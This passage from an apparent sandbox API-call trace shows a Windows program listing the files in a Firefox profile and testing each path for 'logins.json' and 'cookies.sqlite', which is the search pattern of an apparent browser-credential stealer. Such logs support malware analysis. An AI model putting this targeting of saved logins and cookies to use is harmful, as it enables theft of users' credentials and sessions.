HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="places.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" [0160.897] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.897] GetProcessHeap () returned 0x8e0000 [0160.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.897] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="logins.json") returned 0x0 [0160.897] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.897] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.897] GetProcessHeap () returned 0x8e0000 [0160.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.897] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81fbde30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x81fbde30, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x81fbde30, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0160.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.897] lstrlenW (lpString="\\") returned 1 [0160.897] GetProcessHeap () returned 0x8e0000 [0160.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.897] lstrlenW (lpString="pluginreg.dat") returned 13 [0160.898] GetProcessHeap () returned 0x8e0000 [0160.898] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0160.898] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="pluginreg.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" [0160.898] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.898] GetProcessHeap () returned 0x8e0000 [0160.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.898] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="logins.json") returned 0x0 [0160.898] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="cookies.sqlite") returned 0x0 [0160.898] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.898] GetProcessHeap () returned 0x8e0000 [0160.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.898] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c85c10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x853f60d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x12069be0, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0xfde, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="prefs.js", cAlternateFileName="")) returned 1 [0160.898] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.898] lstrlenW (lpString="\\") returned 1 [0160.898] GetProcessHeap () returned 0x8e0000 [0160.898] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.898] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.898] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.898] lstrlenW (lpString="prefs.js") returned 8 [0160.898] GetProcessHeap () returned 0x8e0000 [0160.898] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x926420 [0160.898] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="prefs.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" [0160.898] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.898] GetProcessHeap () returned 0x8e0000 [0160.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.898] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="logins.json") returned 0x0 [0160.898] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="cookies.sqlite") returned 0x0 [0160.898] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.898] GetProcessHeap () returned 0x8e0000 [0160.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.898] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6fa8c70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6fa8c70, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6fa8c70, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="search.json", cAlternateFileName="SEARCH~1.JSO")) returned 1 [0160.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.899] lstrlenW (lpString="\\") returned 1 [0160.899] GetProcessHeap () returned 0x8e0000 [0160.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.899] lstrlenW (lpString="search.json") returned 11 [0160.899] GetProcessHeap () returned 0x8e0000 [0160.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x926420 [0160.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="search.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" [0160.899] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.899] GetProcessHeap () returned 0x8e0000 [0160.899] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.899] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="logins.json") returned 0x0 [0160.899] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="cookies.sqlite") returned 0x0 [0160.899] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.899] GetProcessHeap () returned 0x8e0000 [0160.899] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.899] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb477d930, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb477d930, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb47c9bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="secmod.db", cAlternateFileName="")) returned 1 [0160.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.899] lstrlenW (lpString="\\") returned 1 [0160.899] GetProcessHeap () returned 0x8e0000 [0160.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.899] lstrlenW (lpString="secmod.db") returned 9 [0160.899] GetProcessHeap () returned 0x8e0000 [0160.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x926420 [0160.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="secmod.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" [0160.899] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.899] GetProcessHeap () returned 0x8e0000 [0160.899] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.899] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="logins.json") returned 0x0 [0160.900] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="cookies.sqlite") returned 0x0 [0160.900] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.900] GetProcessHeap () returned 0x8e0000 [0160.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.900] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc3787480, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3787480, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="sessionstore.bak", cAlternateFileName="SESSIO~1.BAK")) returned 1 [0160.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.900] lstrlenW (lpString="\\") returned 1 [0160.900] GetProcessHeap () returned 0x8e0000 [0160.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.900] lstrlenW (lpString="sessionstore.bak") returned 16 [0160.900] GetProcessHeap () returned 0x8e0000 [0160.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x926420 [0160.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.bak" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" [0160.900] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.900] GetProcessHeap () returned 0x8e0000 [0160.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.900] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="logins.json") returned 0x0 [0160.900] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="cookies.sqlite") returned 0x0 [0160.900] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.900] GetProcessHeap () returned 0x8e0000 [0160.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.900] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x84e029d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x84e029d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbc5, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="sessionstore.js", cAlternateFileName="SESSIO~1.JS")) returned 1 [0160.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.900] lstrlenW (lpString="\\") returned 1 [0160.900] GetProcessHeap () returned 0x8e0000 [0160.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.900] lstrlenW (lpString="sessionstore.js") returned 15 [0160.900] GetProcessHeap () returned 0x8e0000 [0160.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0160.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.901] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" [0160.901] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.901] GetProcessHeap () returned 0x8e0000 [0160.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.901] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS 